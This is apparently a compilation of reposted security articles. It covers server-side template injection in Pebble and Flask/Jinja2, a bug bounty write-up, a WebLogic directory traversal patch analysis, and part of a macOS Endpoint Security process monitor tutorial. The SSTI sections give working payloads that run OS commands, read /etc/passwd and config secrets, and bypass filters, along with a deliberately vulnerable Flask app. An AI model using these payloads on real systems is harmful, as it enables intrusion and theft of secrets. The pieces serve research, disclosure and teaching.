variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la')

Basically, every object in Java has a method called getClass() which retrieves a special java.lang.Class, from which it is easy to get an instance of an arbitrary Java class. The usual next step is to get an instance of java.lang.Runtime, since it allows one to execute OS commands. When we came across Pebble for the first time, the exploit was basically identical to the code shown above. The only thing that needed to be done was to add mustache tags on both sides:

{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}

Attempts to protect against getting arbitrary classes in Pebble

The author of Pebble added a protection against the attack and blocked invocation of getClass(). Initially, though, there was a funny way to bypass it, because Pebble tried to be smart when looking for methods in expressions. Suppose you have the following expression:

{{ someString.toUPPERCASE() }}

The expression shouldn't work, since the right name of the method is toUpperCase(), not toUPPERCASE(). Pebble, though, ignored casing in method and property names, so with the code above you would actually call the "normal" toUpperCase(). The issue was that when Pebble tried to block access to getClass(), it checked the name of the method case-sensitively. So you could just use the following statement:

{{ someString.getCLASS().forName(...) }}

and bypass the protection. This issue was fixed in April 2019 in version 3.0.9 by making the comparison case-insensitive.

A few months later, when researching some other Java-related stuff and skimming through the documentation, I noticed that there is another built-in way to get access to an instance of java.lang.Class. A few wrapper classes in Java, like java.lang.Integer, have a field called TYPE whose type is java.lang.Class itself! Hence another way to execute arbitrary code is shown below:

{{ (1).TYPE.forName(...) }}

I reported the issue to Pebble in July 2019, and it was fixed in master using the same approach as is used in FreeMarker, i.e. a blacklist of method calls.
So while I can still do {{ (1).TYPE }}, the forName() method is blocked, making it "impossible" to execute arbitrary code. I put the word "impossible" in quotes since I believe that a bypass is still out there to be found, but I was unable to do so. That's an interesting space to do some research.

Reading the output of a command (Java 9+)

While it has always been easy to execute an arbitrary command in Java, in case of vulnerabilities like Server-Side Template Injection it sometimes happens to be difficult to read the output. It was usually done by iterating over the resulting InputStream or by sending the output out-of-band. When researching Pebble, I noticed that things got much easier in Java 9+, since InputStream now has a convenient method readAllBytes which returns a byte array! The byte[] can then be converted to a String with the String constructor. Here's the exploit:

{% set cmd = 'id' %}
{% set bytes = (1).TYPE
     .forName('java.lang.Runtime')
     .methods[6]
     .invoke(null,null)
     .exec(cmd)
     .inputStream
     .readAllBytes() %}
{{ (1).TYPE
     .forName('java.lang.String')
     .constructors[0]
     .newInstance(([bytes]).toArray()) }}

And the result:

Pebble example exploit

Playing with Pebble

If you wish to play with Pebble, we have prepared a GitHub repo with a Docker container in which you can run various versions of Pebble. You can grab it here: https://github.com/securitum/research/tree/master/r2019_server-side-template-injection-on-the-example-of-pebble. All you need to do is to make sure you have both docker and docker-compose installed and then just run docker-compose up. Then, the webserver runs on http://localhost:4567.

Screenshot of Docker application

Summary

Pebble is no different than many other popular templating engines, in which you can execute arbitrary commands if you are allowed to modify the template itself. The recommendation is to make sure that unauthorized users are never able to modify templates.

Author: Michał Bentkowski

Sursa: https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/
-
RCE with Flask Jinja Template Injection

AkShAy KaTkAr
Sep 17 · 4 min read

I got an invite for a private program on Bugcrowd. The program did not have a huge scope, just a single app with lots of features to test. I usually like this kind of program, as I am not that good with recon.

First thought: let's find out what technology the website is built with. I use Wappalyzer for that. They were using AngularDart, Python Django and Flask. Being a Python developer for the last few years, I know where developers commonly make mistakes.

There was one utility named workflow builder, which was used to build a financial close process flow. You can automate daily activities with it, like sending approvals and sending reminder emails. The email-sending functionality caught my attention, because most of the time these email generator apps are vulnerable to template injection. As this website was built with Python, I was quite sure that they must be using Jinja2 templates.

The send email function has 3 fields: To, title and description. I set {{7*7}} as the title and description and clicked on the send email button. I got an email with "49" as the subject and {{7*7}} as the description. So the subject field was vulnerable to template injection.

Payload: {{7*7}}

What this payload basically does is evaluate the Python expression inside the curly brackets. I tried another payload to get the list of subclasses of the object class.

Payload: {{ [].__class__.__base__.__subclasses__() }}

I got an email containing the list of subclasses of the object class, like below.

Let me explain this payload. If you are familiar with Python, you may know we can create a list by using "[]". You can try these things in the Python interpreter.

1. Access the class of a list:

>>> [].__class__
<type 'list'>    # returns the class of list

2. Access the base class of list:

>>> [].__class__.__base__
<type 'object'>    # returns the base class of list

list is a subclass of the object class.

3. Access the subclasses of the object class:

>>> [].__class__.__base__.__subclasses__()
[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>.....

So our payload gives us a list of all subclasses of the object class. I reported this issue as it is, hoping I wouldn't have to go further to prove its significant impact, but the Bugcrowd triager replied asking for more.

OK, so now I have to provide a POC to prove the impact of this issue to mark it as a P1. Most Django apps have a config file which contains really sensitive info like AWS keys, APIs and encryption keys. I have the path of that config file from my previous findings, so I decided to read that file. To read a file in Python you have to create an object of "file". We already have the list of all subclasses of the object class; let's find the index of the file class:

>>> [].__class__.__base__.__subclasses__().index(file)
40    # returns the index of the "file" object

When you run "[].__class__.__base__.__subclasses__().index(file)" in a Python interpreter, you get the index of the file object. I tried the same payload on the target but it gave me nothing; something was wrong. I tried to access other objects, but they gave similar errors and returned no value.

Next, I decided to directly access the file object, as we know its index in the list of object subclasses is 40. So I tried the payload {{[].__class__.__base__.__subclasses__()[40] }} but got no success; this payload returned a result similar to the one above. The payload was breaking somewhere, but I was not able to find where.
After some research, I came to the conclusion that maybe indexing was blocked or was breaking my payload. If you know a little Python, you may know there are multiple ways to return a value from a list; one of them is using the "pop" function:

>>> [1,2,3,4,5].pop(2)
3

The above code returns the third value of the list and removes it from that list. So now my new payload is:

{{[].__class__.__base__.__subclasses__().pop(40) }}

The above payload gives me the "file" object. OK, so now I have the "file" object; I can read any file on the server. Let's read the "etc/passwd" file.

Payload: {{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}

etc/passwd output in email subject

Finally, I was able to read files on the server. I was also able to read local files on the GCE instance responsible for sending notifications, including some source code, and configuration files containing very sensitive values (e.g. API and encryption keys).

Thanks for reading. If you like this article, please share. You are free to ask any questions, just DM me on akshukatkar.

Sursa: https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870
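A side note on the hardcoded index 40 used above: the position of the file class in the subclass list varies between Python builds, so when reproducing this locally it is more reliable to look the class up by name first. Plain Python 2 below, run outside the template (the file type does not exist in Python 3):

# Python 2: locate the file class by name instead of assuming index 40
subs = [].__class__.__base__.__subclasses__()
idx = [c.__name__ for c in subs].index('file')
print(idx)                              # 40 on this interpreter, but not on all
print(subs[idx]('/etc/passwd').read())  # the same primitive the payload uses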
-
Patch Analysis: Examining a Missing Dot-Dot in Oracle WebLogic

September 17, 2019 | KP Choubey

Earlier this year, an Oracle WebLogic deserialization vulnerability was discovered and released as an 0day vulnerability. The bug was severe enough for Oracle to break their normal quarterly patch cadence and release an emergency update. Unfortunately, researchers quickly discovered the patch could be bypassed by attackers. Patches that don't completely resolve a security problem seem to be a bit of a trend, and Oracle is no exception. This blog covers a directory traversal bug that took more than one try to get fully corrected. Oracle initially patched this vulnerability as CVE-2019-2618 in April 2019, but later released a corrected patch in July.

Vulnerability Details

Oracle WebLogic is an application server for building and deploying Java Enterprise Edition (EE) applications. The default installation of the WebLogic server contains various applications to maintain and configure domains and applications. One such application is bea_wls_deployment_internal.war, which contains a feature to upload files. A file can be uploaded by sending an authenticated request to the URI /bea_wls_deployment_internal/DeploymentService. The application calls the handlePlanOrApplicationUpload() method if the value of the wl_request_type header of the request is "app_upload" or "plan_upload". The handlePlanOrApplicationUpload() method validates the value of the wl_upload_application_name header and checks for two variants of directory traversal characters: ../ and /..:

Figure 1 - Directory Traversal Character Checks – With Comments Added

The path <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\upload\ is stored in the variable uploadingDirName. The wl_upload_application_name request header value is used as a subdirectory of this path. The method shown above appends the user-controlled value of wl_upload_application_name to uploadingDirName and passes it via the saveDirectory argument of doUploadFile(). The doUploadFile() function should create a file in this location using the filename parameter of the request:

Figure 2 - The doUploadFile() Function

The wl_upload_application_name and filename fields were vulnerable to directory traversal. In April 2019, Oracle tried to patch the directory traversal as CVE-2019-2618. The patch for CVE-2019-2618 added checks for two more variants of directory traversal characters in the wl_upload_application_name field: \.. and ..\:

Figure 3 - Code Changes from CVE-2019-2618

For the filename field, CVE-2019-2618 added a check to doUploadFile() to ensure the final path where the file is saved contains the proper save directory, as indicated by the variable saveDir. The value of saveDir is <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\upload\[UPLOAD_APP], where the value of [UPLOAD_APP] is found in wl_upload_application_name. The patched doUploadFile() method throws an error if the filename variable contains directory traversal characters and does not contain the string represented by saveDir:

Figure 4 - Exception Error for saveDir

This validation of the fileName field is mostly sufficient. As a side note, though, it would have been better if they had used startsWith instead of contains. The way the patch is written, the validation theoretically can be bypassed if anywhere within the final path there is a substring resembling the legitimate save path. There is no direct route to exploitation, though.
The doUploadFile() function will not automatically create a directory structure if the one specified by saveTo doesn't exist. So, for a bypass of the above patch to be relevant, an attacker would need some other technique that is powerful enough to enable creation of arbitrary directory structures within a sensitive location on the server, yet fails to offer a file upload capability of its own. On the whole, this is an unlikely scenario.

However, in regard to the wl_upload_application_name header field, the CVE-2019-2618 patch is inadequate and can be bypassed by setting the value of the wl_upload_application_name header to .. (dot-dot). This allows uploading to any subdirectory of the <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer directory. Note the absence of the final path component, which should be "upload". This is a sufficient condition to achieve code execution by writing a JSP file within the <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\tmp\ directory. An example of a POST request to write a file poc.jsp to a location within the <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\tmp directory is as follows:

Figure 5 - Demonstrating the Directory Traversal

A file written to the \_WL_internal\bea_wls_internal subdirectory of the tmp directory can be accessed without authentication. For the aforementioned example, the attacker can execute JSP code by sending a request to the URI /bea_wls_internal/poc.jsp. The patch for CVE-2019-2827, released in July, fixed the directory traversal vulnerability correctly by validating the wl_upload_application_name header field for .. (dot-dot) directory traversal characters as follows:

Figure 6 - Code Changes for CVE-2019-2827

Conclusion

Variations of directory traversal bugs have existed for some time, but continue to affect multiple types of software. Developers should ensure they are filtering or sanitizing user input prior to using it in file operations. Over the years, attackers have used various encoding tricks to get around traversal defenses. For example, using URI encoding, "%2e%2e%2f" translates to "../" and could evade some filters. Never underestimate the creativity of those looking to exploit your systems.

While this blog covers a failed patch from Oracle, multiple vendors have similar problems. Patch analysis is a great way to probe for things that may have been missed by the developers, and a great way to find related bugs is to examine the patched components. You can find me on Twitter @nktropy, and follow the team for the latest in exploit techniques and security patches.

Sursa: https://www.zerodayinitiative.com/blog/2019/9/16/patch-analysis-examining-a-missing-dot-dot-in-oracle-weblogic
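To make that conclusion concrete: the safe pattern is to canonicalize first and then compare the result against the intended base directory, rather than scanning for traversal substrings as the failed patches did. A minimal illustrative sketch in Python follows (the WebLogic code itself is Java, and the helper name here is hypothetical):

import os

def safe_join(base, *untrusted):
    # resolve symlinks and '..' before comparing, then require the result
    # to remain inside the base directory (startswith, not contains)
    resolved_base = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base, *untrusted))
    if candidate != resolved_base and not candidate.startswith(resolved_base + os.sep):
        raise ValueError('path traversal attempt: %r' % (untrusted,))
    return candidate

print(safe_join('/srv/upload', 'app1', 'plan.xml'))  # ok
print(safe_join('/srv/upload', '..', 'x.jsp'))       # raises ValueError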
-
Explaining Server Side Template Injections

Web Hacking

chivato

Hey, I am chivato, this is my first post on here and I hope it is of some use to people. Exploiting SSTI in strange cases will be the next post I make. Any and all feedback is appreciated <3.

Building the environment:

We start with just a basic Flask web application, written in Python (I will be using Python 2), which is as follows:

from flask import *

app = Flask(__name__)

@app.route("/")
def home():
    return "Hello, World!"

if __name__ == "__main__":
    app.run(debug=True, host="localhost", port=1337)

This website will just return "Hello, World!" when visited. Now, we need to add parameters so we can interact with the web application. This can be done with Flask's request object, so we just add request.args.get('parameter name'). In my case the parameter will be called "name", so here is how our code should look:

from flask import *

app = Flask(__name__)

@app.route("/")
def home():
    output = request.args.get('name')
    return output

if __name__ == "__main__":
    app.run(debug=True, host="localhost", port=1337)

But since this always returns the value from the GET request, if you go to the website without a GET parameter called name, you will get an error. To fix this I included a simple if statement:

from flask import *

app = Flask(__name__)

@app.route("/")
def home():
    output = request.args.get('name')
    if output:
        pass
    else:
        output = "Empty"
    return output

if __name__ == "__main__":
    app.run(debug=True, host="localhost", port=1337)

Perfect, now we have a Flask app that returns the value in the GET parameter and doesn't crash.

Now to implement the vulnerability. The vulnerability consists of templates being executed on the side of the server, when we have control of what the template contains. For example, a vulnerability was found in Uber by the famous bug hunter known as orange. It consisted of making your profile name follow the template syntax for Jinja2 (which is {{ template content }}), and then when you received the email, the template had been executed. So, imagine you set {{'7'*7}} as your username; when you receive the email, you will see "Welcome 7777777."

As stated above, the vulnerability comes into play when the template is executed on the side of the server and we control the input, so let's make sure our input is rendered. This can be done with render_template_string from Flask, which takes a string and treats it as text that may have templates in it; if it does, it executes them. Note that we only render the value when it is actually present (rendering None would itself throw an error):

from flask import *

app = Flask(__name__)

@app.route("/")
def home():
    output = request.args.get('name')
    if output:
        output = render_template_string(output)
    else:
        output = "Sp0re<3"
    return output

if __name__ == "__main__":
    app.run(debug=True, host="localhost", port=1337)

As you can see, now, if you visit "http://localhost:1337/?name={{'7'*7}}", you will be welcomed with "7777777". We now have our environment set up and ready to play with (later on I will be looking at some simple WAF bypass methods, but for now we are just leaving our script as this).

Recognising and exploiting the vulnerability:

Template engines are used VERY widely nowadays, and they exist for a variety of different languages, such as PHP, JS, Python (obviously), Ruby and many more. The base of why they are useful is in case you have a large website or platform, where not many details change between pages.
For example, Netflix has the same layout for its content, and the only things that change are the title, description, banner and some other minor details; so instead of creating a whole page per show, they just feed the data to their templates, and the engine puts it all together. Template engines can be used for anything that follows that process of having to use the same thing tons of times, so in Uber's example, instead of making a new email every time, they had a single email template and just changed the name each time.

So, knowing that we can execute templates, what can we actually do with that? Well, honestly, a lot.

> Read the configuration. This can be used to grab the SECRET_KEY, which is used to sign cookies; with this, you can create and sign your own cookies. Example payload for Jinja2:

{{ config }}

> Read local files (LFR). This can be used to do a variety of things, ranging from directly reading a flag if it is held in the templates folder with a basic {% include 'flag.txt' %}, to reading any file on the system. The latter can be done via the RCE payload (see next point), or via an alternative. An example of an alternative payload would be:

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} // May vary depending on version.

> Remote command execution (RCE). Finally, the remote command execution payload. Obviously the most severe and dangerous one, and it can be done a variety of ways. One is going through the subclasses and finding the subprocess.Popen index:

{{''.__class__.mro()[1].__subclasses__()[ HERE IS WHERE THE NUMBER WOULD GO ]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}

Although I have had much more success with the following payload, which uses Popen without guessing the offset:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("whoami").read().zfill(417)}}{%endif%}{% endfor %}

You may need to go to the end of the page to skip all the 0's that are produced by that payload.

Now that some of the basic exploits are covered, we can take a look at bypass methods. Let's start with the parameter bypass method. Imagine you have a template engine, in this case Flask, that takes a value from a parameter and removes any "_" from it. This would restrict us from doing a variety of things, for example {{ __class__ }}. This bypass method is based on the fact that only that one parameter gets checked for underscores, so all we have to do is pass the underscores via another parameter and pull them in from our template injection.

We start with calling the class attribute from request (the WAF would block the underscores):

{{request.__class__}}

Then, we remove the "." and use |attr to tell the template that we are accessing request's attributes:

{{request|attr("__class__")}}

Next, we pipe a list of strings through the "join" filter, which sticks all of the values together; in this case it would stick "__", "class" and "__" together to create "__class__":

{{request|attr(["__","class","__"]|join)}}

We then remove one of the underscores and just multiply a single one by two; in Python, "[STRING]"*[NUMBER] will make a new string repeating the original string that many times, so "test"*3 would be equal to "testtesttest".
{{request|attr(["_"*2,"class","_"*2]|join)}}

Finally, we tell the payload to get the underscores from another parameter called "usc", and we supply the underscore via that parameter. An example URL to use against our script would be:

http://localhost:1337/?name={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&usc=_

This may just return Empty, since we set an if statement that basically stated: if our rendered template is empty, then just set the output to Empty.

Moving on to the next bypass method. This one is used to bypass cases where "[" and "]" are blocked, since they are needed for the payload stated above. It is honestly just a syntax thing, but it manages to achieve the same result without having to use any "[", "]", or "_". Some examples are:

http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_

http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_

These were pulled from an amazing page called "PayloadsAllTheThings" (see the sources at the bottom of this post). Another one, in case "." is blocked, uses Jinja2 filters with |attr():

http://localhost:1337/?name={{request|attr(["_"*2,"class","_"*2]|join)}}

Finally, a bypass method for the case where "[", "]", "|join" and / or "_" are blocked, since it uses none of the previously stated characters:

http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_

Now these are just the base bypass payloads, but they can be combined and manipulated to achieve some amazing things. Here is a payload I made myself that builds a payload to leak the config:

{{request|attr(["url",request.args.usc,"for.",request.args.usc*2,request.args.1,request.args.usc*2,".current",request.args.usc,"app.",request.args.conf]|join)}}&1=globals&usc=_&link=url&conf=config

Conclusion:

This has just been a basic explanation of how to set up a website vulnerable to SSTI, how the exploitation works, and some basic bypass methods for any WAFs that you may encounter (a small practice target is sketched below, after the sources). I would also like to shout out a moderator from HackTheBox called "makelaris", since he was actually the one who sparked my interest in SSTIs, and has taught me a lot about them.

If this post is enjoyed and appreciated I will make more about more advanced SSTI exploitation cases, and also about how SSTIs may work and be exploited in other template engines.

Sources:

PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md

pequalsnp-team: https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti

A good HackTheBox retired machine that has an SSTI step: Oz (https://www.hackthebox.eu/home/machines/profile/152)

A writeup for the Oz machine: https://0xdf.gitlab.io/2019/01/12/htb-oz.html

More exploring SSTIs: https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html

Orange's disclosed bug bounty report from Uber: https://hackerone.com/reports/125980

Sursa: https://0x00sec.org/t/explaining-server-side-template-injections/16297
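To practice the parameter-smuggling bypasses above locally, the lab app from the beginning can be extended with a deliberately naive filter that strips "_", "[" and "]" from the name parameter only. This is a sketch; the blacklist is intentionally weak, mirroring the scenario described above:

from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route("/")
def home():
    output = request.args.get('name')
    if not output:
        return "Empty"
    # naive WAF: strip blocked characters from this parameter only,
    # so payloads can smuggle them back in via other request parameters
    for bad in ('_', '[', ']'):
        output = output.replace(bad, '')
    return render_template_string(output)

if __name__ == "__main__":
    app.run(debug=True, host="localhost", port=1337)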
-
Writing a Process Monitor with Apple's Endpoint Security Framework

September 7, 2019

# ./processMonitor
Starting process monitor...[ok]

PROCESS EXEC ('ES_EVENT_TYPE_NOTIFY_EXEC')
pid: 7655
path: /bin/ls
uid: 501
args: ( ls, "-lart", "." )
signing info: {
    cdHash = 5180A360C9484D61AF2CE737EAE9EBAE5B7E2850;
    csFlags = 603996161;
    isPlatformBinary = 1 (true);
    signatureIdentifier = "com.apple.ls";
}

On github: Process Monitoring Library

Background

A common component of (many) security tools is a process monitor. As its name implies, a process monitor watches for the creation of new processes (plus extracts information such as process id, path, arguments, and code-signing information). Many of my Objective-See tools track process creations. Examples include:

Ransomwhere?
Tracks process creations to classify processes (as belonging to the OS/Apple, from 3rd-party developers, etc.) such that if a process begins rapidly encrypting files, Ransomwhere? can quickly determine if this encryption is legitimate or possibly ransomware.

TaskExplorer
Tracks process creations (and terminations) in order to display a real-time list of active processes to the user.

BlockBlock
Tracks process creations to map process identifiers (pids) reported in persistent file events to full process paths, in order to provide more informative alerts to users when persistence events occur.

After a while I got tired of including duplicative process monitoring code in each project, so I decided to write a process monitoring library. Now, any tool that is interested in tracking process events can simply link against this library. The source code for this (original) process monitoring library can be found on Objective-See's github page: Proc Info.

Until now, the preferred way to programmatically create a process monitor was to subscribe to events from Apple's OpenBSM subsystem. For a deep-dive into the OpenBSM subsystem, check out my ShmooCon talk: "Get Cozy with OpenBSM Auditing".

Though sufficient, the OpenBSM subsystem is rather painful to programmatically interface with. For starters, it requires one to parse and tokenize various (binary) audit records and audit tokens (that, amongst other things, contain process-related events):

//init (remaining) balance to record's total length
recordBalance = recordLength;

//init processed length to start (zer0)
processedLength = 0;

//parse record
// read all tokens/process
while(0 != recordBalance)
{
    //extract token
    // and sanity check
    if(-1 == au_fetch_tok(&tokenStruct, recordBuffer + processedLength, recordBalance))
    {
        //error
        // skip record
        break;
    }

    //now parse tokens
    // looking for those that are related to process start/terminated events

    //add length of current token
    processedLength += tokenStruct.len;

    //subtract length of current token
    recordBalance -= tokenStruct.len;
}

Moreover, the audit events delivered by the OpenBSM subsystem do not contain information about the processes' code-signing identities. Thus, once you receive an audit event related to process creation, if you want to know, for example, whether said process is signed by Apple proper, you have to write extra code to programmatically extract this information. This is relatively non-trivial and may be computationally (CPU) intensive.
Finally, the OpenBSM audit subsystem (by design) is reactive, meaning that by the time you've received the events (i.e. process creation), they have already occurred. This runs the gamut from being mildly annoying (for example, a short-lived process may have already exited, meaning you cannot query it to retrieve its code-signing identity) to, well, rather problematic. For example, if you're writing a security tool, clearly there exist many scenarios where being proactive about process events would be ideal (i.e. blocking a piece of malware before it is allowed to execute). Until now, the only way to realize proactive security protections was to live in the kernel (something that Apple is rather drastically deprecating).

Apple's Endpoint Security Framework

With Apple's push to kick 3rd-party developers (including security products) out of the kernel, coupled with the realization (finally!) that the existing subsystems were rather archaic and dated, Apple recently announced the new, user-mode "Endpoint Security Framework" (which provides a user-mode interface to a new "Endpoint Security Subsystem"). As we'll see, this framework addresses many of the aforementioned issues & shortcomings. Specifically, it provides:

a well-defined and (relatively) simple API
comprehensive process code-signing information for events
the ability to proactively respond to process events (though here, our process monitor will be passive)

I'm often somewhat critical of Apple's security posture (or lack thereof). However, the "Endpoint Security Framework" is potentially a game-changer for those of us seeking to write robust user-mode security tools for macOS. Mahalo Apple! Personally I'm stoked 🥳

This blog is a practical walk-thru of creating a comprehensive user-mode process monitor that leverages Apple's new "Endpoint Security Framework". For more information on the framework, see Apple's developer documentation: Endpoint Security Framework.

There are a few prerequisites to leveraging the Endpoint Security Framework:

The com.apple.developer.endpoint-security.client entitlement
This can be requested from Apple via this link. Until then (I'm still waiting 😅), give yourself that entitlement (i.e. in your app's Info.plist file, and disable SIP such that it remains pseudo-unenforced).

<dict>
    <key>com.apple.developer.endpoint-security.client</key>
    <true/>
</dict>

Xcode 11/macOS 10.15 SDK
As these are both (still) in beta, for now it's recommended to perform development in a virtual machine (running the macOS 10.15 beta).

macOS 10.15 (Catalina)
It appears the Endpoint Security Framework will not be made available to older versions of macOS. As such, any tools that leverage this framework will only run on 10.15 or newer.

Ok, enough chit-chat, let's dive in! Our goal is simple: create a comprehensive user-mode process monitor that leverages Apple's new "Endpoint Security Framework". Besides "capturing" process events, we're also interested in:

the process id (pid)
the process path
any process arguments
any process code-signing information

…luckily, unlike the OpenBSM subsystem, the new Endpoint Security Framework makes this a breeze! Besides Apple's documentation, the "Endpoint Security Demo" on github, by a developer named Omar Ikram, was hugely helpful! Thanks Omar! 🙏

In order to subscribe to events from the "Endpoint Security Subsystem", we must first create a new "Endpoint Security" client.
The es_new_client function provides the interface to perform this action. Various (well commented!) header files in the usr/include/EndpointSecurity/ directory (such as ESClient.h) are also great resources:

$ ls /Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/usr/include/EndpointSecurity/
ESClient.h  ESMessage.h  ESOpaqueTypes.h  ESTypes.h  EndpointSecurity.h

$ less EndpointSecurity/ESClient.h

struct es_client_s;

/**
 * es_client_t is an opaque type that stores the endpoint security client state
 */
typedef struct es_client_s es_client_t;

/**
 * Initialise a new es_client_t and connect to the ES subsystem
 * @param client Out param. On success this will be set to point to the newly allocated es_client_t.
 * @param handler The handler block that will be run on all messages sent to this client
 * @return es_new_client_result_t indicating success or a specific error.
 */

In code, we first include the EndpointSecurity.h file, declare a global variable (type: es_client_t*), then invoke the es_new_client function:

#import <EndpointSecurity/EndpointSecurity.h>

//(global) endpoint client
es_client_t* endpointClient = nil;

//create client
// callback invokes (user) callback for new processes
result = es_new_client(&endpointClient, ^(es_client_t *client, const es_message_t *message)
{
    //process events

});

//error?
if(ES_NEW_CLIENT_RESULT_SUCCESS != result)
{
    //err msg
    NSLog(@"ERROR: es_new_client() failed with %d", result);

    //bail
    goto bail;
}

Note that the es_new_client function takes an (out) pointer to a variable of type es_client_t. Once the function returns, this variable will hold the initialized endpoint security client (required by all other endpoint security APIs). The second parameter of the es_new_client function is a block that will be automatically invoked on endpoint security events (more on this shortly!).

The es_new_client function returns a variable of type es_new_client_result_t. Peeking at ESTypes.h reveals the possible values for this variable:

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESTypes.h

/**
 @brief Error conditions for creating a new client
 */
typedef enum {
    ES_NEW_CLIENT_RESULT_SUCCESS,
    ///One or more invalid arguments were provided
    ES_NEW_CLIENT_RESULT_ERR_INVALID_ARGUMENT,
    ///Communication with the ES subsystem failed
    ES_NEW_CLIENT_RESULT_ERR_INTERNAL,
    ///The caller is not properly entitled to connect
    ES_NEW_CLIENT_RESULT_ERR_NOT_ENTITLED,
    ///The caller is not permitted to connect. They lack Transparency, Consent, and Control (TCC) approval from the user.
    ES_NEW_CLIENT_RESULT_ERR_NOT_PERMITTED
} es_new_client_result_t;

Hopefully these are rather self-explanatory (i.e. ES_NEW_CLIENT_RESULT_SUCCESS means ok!, while ES_NEW_CLIENT_RESULT_ERR_NOT_ENTITLED means you don't hold the com.apple.developer.endpoint-security.client entitlement). If all is well, the es_new_client function will return ES_NEW_CLIENT_RESULT_SUCCESS, indicating that it has created a newly initialized Endpoint Security client (es_client_t) for us to use.

To compile the above code, link against the Endpoint Security Framework (libEndpointSecurity).

Once we've created an Endpoint Security client via es_new_client, we must now tell the Endpoint Security Subsystem what events we are interested in (or want to "subscribe to", in Apple parlance).
This is accomplished via the es_subscribe function (documented here and in the ESClient.h header file):

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESClient.h

/**
 * Subscribe to some set of events
 * @param client The client that will be subscribing
 * @param events Array of es_event_type_t to subscribe to
 * @param event_count Count of es_event_type_t in `events`
 * @return es_return_t indicating success or error
 * @note Subscribing to new event types does not remove previous subscriptions
 */
OS_EXPORT
API_AVAILABLE(macos(10.15)) API_UNAVAILABLE(ios, tvos, watchos)
es_return_t
es_subscribe(es_client_t * _Nonnull client, es_event_type_t * _Nonnull events, uint32_t event_count);

This function takes the initialized endpoint client (returned by the es_new_client function), an array of events of interest, and the size of said array:

//(process) events of interest
es_event_type_t events[] = {
    ES_EVENT_TYPE_NOTIFY_EXEC,
    ES_EVENT_TYPE_NOTIFY_FORK,
    ES_EVENT_TYPE_NOTIFY_EXIT
};

//subscribe to events
if(ES_RETURN_SUCCESS != es_subscribe(endpointClient, events,
   sizeof(events)/sizeof(events[0])))
{
    //err msg
    NSLog(@"ERROR: es_subscribe() failed");

    //bail
    goto bail;
}

The events to subscribe to depend on, well, what events are of interest to you! As we're writing a process monitor, we're (only) interested in the following three process-related events:

ES_EVENT_TYPE_NOTIFY_EXEC
"A type that represents process execution notification events."

ES_EVENT_TYPE_NOTIFY_FORK
"A type that represents process forking notification events."

ES_EVENT_TYPE_NOTIFY_EXIT
"A type that represents process exit notification events."

For a full list of events that one may subscribe to, take a look at the es_event_type_t enum in the ESTypes.h header file:

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESTypes.h

/**
 * @brief The valid event types recognized by EndpointSecurity
 */
typedef enum {
    ES_EVENT_TYPE_AUTH_EXEC,
    ES_EVENT_TYPE_AUTH_OPEN,
    ES_EVENT_TYPE_AUTH_KEXTLOAD,
    ES_EVENT_TYPE_AUTH_MMAP,
    ES_EVENT_TYPE_AUTH_MPROTECT,
    ES_EVENT_TYPE_AUTH_MOUNT,
    ES_EVENT_TYPE_AUTH_RENAME,
    ES_EVENT_TYPE_AUTH_SIGNAL,
    ES_EVENT_TYPE_AUTH_UNLINK,
    ES_EVENT_TYPE_NOTIFY_EXEC,
    ES_EVENT_TYPE_NOTIFY_OPEN,
    ES_EVENT_TYPE_NOTIFY_FORK,
    ES_EVENT_TYPE_NOTIFY_CLOSE,
    ES_EVENT_TYPE_NOTIFY_CREATE,
    ES_EVENT_TYPE_NOTIFY_EXCHANGEDATA,
    ES_EVENT_TYPE_NOTIFY_EXIT,
    ES_EVENT_TYPE_NOTIFY_GET_TASK,
    ES_EVENT_TYPE_NOTIFY_KEXTLOAD,
    ES_EVENT_TYPE_NOTIFY_KEXTUNLOAD,
    ES_EVENT_TYPE_NOTIFY_LINK,
    ES_EVENT_TYPE_NOTIFY_MMAP,
    ES_EVENT_TYPE_NOTIFY_MPROTECT,
    ES_EVENT_TYPE_NOTIFY_MOUNT,
    ES_EVENT_TYPE_NOTIFY_UNMOUNT,
    ES_EVENT_TYPE_NOTIFY_IOKIT_OPEN,
    ES_EVENT_TYPE_NOTIFY_RENAME,
    ES_EVENT_TYPE_NOTIFY_SETATTRLIST,
    ES_EVENT_TYPE_NOTIFY_SETEXTATTR,
    ES_EVENT_TYPE_NOTIFY_SETFLAGS,
    ES_EVENT_TYPE_NOTIFY_SETMODE,
    ES_EVENT_TYPE_NOTIFY_SETOWNER,
